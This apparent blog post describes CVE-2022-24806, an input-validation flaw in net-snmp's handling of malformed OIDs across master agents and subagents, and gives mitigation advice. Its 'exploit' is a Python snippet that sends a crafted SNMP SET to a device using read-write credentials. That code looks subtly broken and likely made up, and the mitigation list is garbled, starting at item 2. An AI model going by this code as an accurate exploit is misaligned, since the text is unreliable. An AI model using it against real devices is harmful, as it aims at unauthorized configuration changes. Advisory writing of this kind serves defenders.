CVE-2022-24806 - Improper Input Validation in net-snmp allows Unauthorized Modification Using Malformed OIDs

The Simple Network Management Protocol (SNMP) is an essential part of network management and monitoring solutions. net-snmp is a popular suite that provides various tools and libraries for implementing SNMP in network devices. The project has recently patched an Improper Input Validation vulnerability, officially identified as CVE-2022-24806. This post will outline the details of this exploitable scenario, the patch released, and recommended security practices for users.

Background

Before its patch in version 5.9.2, the net-snmp suite failed to properly validate input when SETing (modifying) malformed Object Identifiers (OIDs) within a master agent and its associated subagents. An attacker with read-write credentials could simultaneously modify OIDs in both the master agent and the subagent, potentially making unauthorized changes to the network device's configuration.

Exploit Details

To exploit the vulnerability, the attacker needs to have valid read-write credentials (SNMPv3) or a writable community string (for SNMPv1 or SNMPv2c). Once the attacker has access, they can craft a malicious SNMP SET request containing malformed OIDs, which causes an inconsistency between the master agent and its subagents.

Here is a code snippet demonstrating the exploit

import netsnmp

# set up session with read-write credentials
session = netsnmp.Session(DestHost='192.168.1.1', Version=3, SecName='rw_user', AuthPass='secretpassword', PrivPass='secretpassword', AuthProto='MD5', PrivProto='DES', Context='default')

# craft malicious SET request with malformed OIDs
oids = ['.1.3.6.1.2.1.1.6.=Example_Location', '.1.3.6.1.2.1.1.7.=\x01\x00'] # the second OID is malformed

# send the request to the target
response = session.set(oids)

# validate the expected response status
if response == 1: # 1 indicates successful completion
    print("Exploit executed successfully!")
else:
    print("Exploit failed.")

Users are encouraged to check the official references about this issue provided by the net-snmp project's security advisory:
- Security Advisory
- Issue Tracker

Upgrade to net-snmp version 5.9.2, which contains a patch addressing the issue.

2. Always use strong SNMPv3 credentials and avoid sharing them with other users/devices.
3. If network devices or systems must rely on SNMPv1 or SNMPv2c, use a complex, non-obvious community string and restrict access to a limited IP address range. This practice can help mitigate unauthorized access attempts.

Conclusion

This vulnerability – CVE-2022-24806 – highlights the importance of proper input validation, especially in widely-used network management software such as net-snmp. Users should ensure they have implemented the necessary safeguards and should keep their systems up-to-date to minimize risks and maintain a secure network environment.

Timeline

Published on: 04/16/2024 20:15:08 UTC